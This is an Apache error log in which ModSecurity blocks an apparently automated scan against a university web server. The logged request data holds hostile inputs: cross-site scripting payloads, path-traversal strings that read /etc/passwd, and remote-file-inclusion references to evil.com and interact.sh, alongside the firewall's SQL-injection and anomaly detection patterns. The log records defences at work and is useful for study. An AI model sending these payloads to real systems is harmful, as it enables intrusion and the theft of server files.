[Tue Aug 29 11:55:23.914766 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16O8Co-f0AAAqSwscAAAAN"]
[Tue Aug 29 11:55:23.938513 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAoz8EwAAAAS"]
[Tue Aug 29 11:55:23.999409 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAoz8E8AAAAS"]
[Tue Aug 29 11:55:24.659203 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAolKoEAAAAe"]
[Tue Aug 29 11:55:24.659444 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAAoz8FQAAAAS"]
[Tue Aug 29 11:55:25.624622 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAolKoUAAAAe"]
[Tue Aug 29 11:55:26.084602 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PsCo-f0AAAqqtfsAAAAA"]
[Tue Aug 29 11:55:26.562593 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqsV7UAAAAB"]
[Tue Aug 29 11:55:28.625989 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAApbUhoAAAAh"]
[Tue Aug 29 11:55:29.540431 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAApXgqsAAAAU"]
[Tue Aug 29 11:55:30.571126 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAApXgrYAAAAU"]
[Tue Aug 29 11:55:30.687646 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqY6E0AAAAr"]
[Tue Aug 29 11:55:31.763020 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAqqthAAAAAA"]
[Tue Aug 29 11:55:32.571366 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAApXgsAAAAAU"]
[Tue Aug 29 11:55:34.007763 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAAqTvtkAAAAa"]
[Tue Aug 29 11:55:35.743522 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16R8Co-f0AAApbUkIAAAAh"]
[Tue Aug 29 11:55:36.153667 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAq3a5IAAAAI"]
[Tue Aug 29 11:55:36.600059 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq4fVEAAAAJ"]
[Tue Aug 29 11:55:37.969156 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAAqeFYMAAAAx"]
[Tue Aug 29 11:55:38.107443 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAApHRj0AAAAP"]
[Tue Aug 29 11:55:38.628127 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAq2KekAAAAE"]
[Tue Aug 29 11:55:39.851847 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAq4fVwAAAAJ"]
[Tue Aug 29 11:55:40.093340 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAqTvwAAAAAa"]
[Tue Aug 29 11:55:41.939930 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqSwyYAAAAN"]
[Tue Aug 29 11:55:43.799649 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqSwywAAAAN"]
[Tue Aug 29 11:55:44.031155 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16UMCo-f0AAAolKvgAAAAe"]
[Tue Aug 29 11:55:44.544910 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqeFaUAAAAx"]
[Tue Aug 29 11:55:44.670912 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAq5@EsAAAAK"]
[Tue Aug 29 11:55:45.583825 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAq@sYMAAAAM"]
